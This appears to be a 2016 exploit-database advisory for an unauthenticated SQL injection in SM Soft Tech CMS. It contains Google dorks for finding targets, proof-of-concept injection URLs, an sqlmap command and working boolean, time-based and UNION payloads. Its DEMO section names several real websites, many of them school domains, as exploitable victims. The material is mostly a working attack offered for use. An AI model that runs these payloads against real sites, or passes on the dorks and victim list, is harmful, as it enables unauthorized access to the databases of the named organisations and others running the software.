SM Soft Tech CMS 1.0 SQL Injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>SM Soft Tech CMS 1.0 SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>========================================================== [+] Title :- SM SOFT TECH CMS - SQL INJECTION [+] Date :- 24 - MAR - 2016 [+] Vendor Homepage :- http://www.smsofttech.net/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- "Developed by SM SOFT TECH" "Design & Developed by SM SOFT TECH" +inurl:/.php?id= [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="732036313300271a123d">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>) [+] Team name :- Team Alastor Breeze, Intelligent-Exploit [+] Official Website :- intelligentexploit.com [+] The official Members :- Sh0rTy420, <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="2e7e6e5c621e5b">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>$, !nfIn!Ty, Th3G0v3Rn3R, m777k [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha [+] Contact :- <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="c1a8afa5a8a0afeff0f2f2f6efa9a0a2aaa4b381a6aca0a8adefa2aeac">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>, <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="65160d0a17111c060d0417160a07000416250208040c094b060a08">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/***/domains/XXX.edu.bd/public_html/event-details.php [+] POC :- http://127.0.0.1/event-details.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://www.[WEBSITE].com/event-details.php?id=4' order by [SQL IN4JECTION]--+ http://www.[WEBSITE].com/event-details.php?id=4' union all select [SQL INJECTION]--+ SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/XXX.php?id=[SQL]" --dbs ++++++++++++++++++++++++++ --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 8467=8467 AND 'iGHF'='iGHF Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))PhJR) AND 'cmRt'='cmRt Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71707a7671,0x5758774b584a7345496f,0x7170786b71),NULL,NULL,NULL,NULL-- --- [+] DEMO :- http://orbitcreditsc.com/event-details.php?id=4' http://www.asrahs.edu.bd/event-details.php?id=1' http://afi.edu.bd/notice.php?id=6' http://bakaliahighschool.edu.bd/event-details.php?id=1' http://www.ijmafurniture.com/preview.php?id=33' http://www.fbm.edu.bd/notice.php?id=6' ======================================================= </BODY></HTML>
